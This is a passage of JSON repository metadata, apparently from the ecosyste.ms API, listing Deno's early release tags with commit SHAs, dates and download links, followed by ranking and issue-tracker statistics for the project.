bcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T05:12:59.086Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":4.828658004990089,"dependent_packages_count":4.524481090952063,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":4.676569547971076},"purl":"pkg:golang/github.com/%21denoland/deno","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/Denoland/deno","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/Denoland/deno","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/Denoland/deno/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledi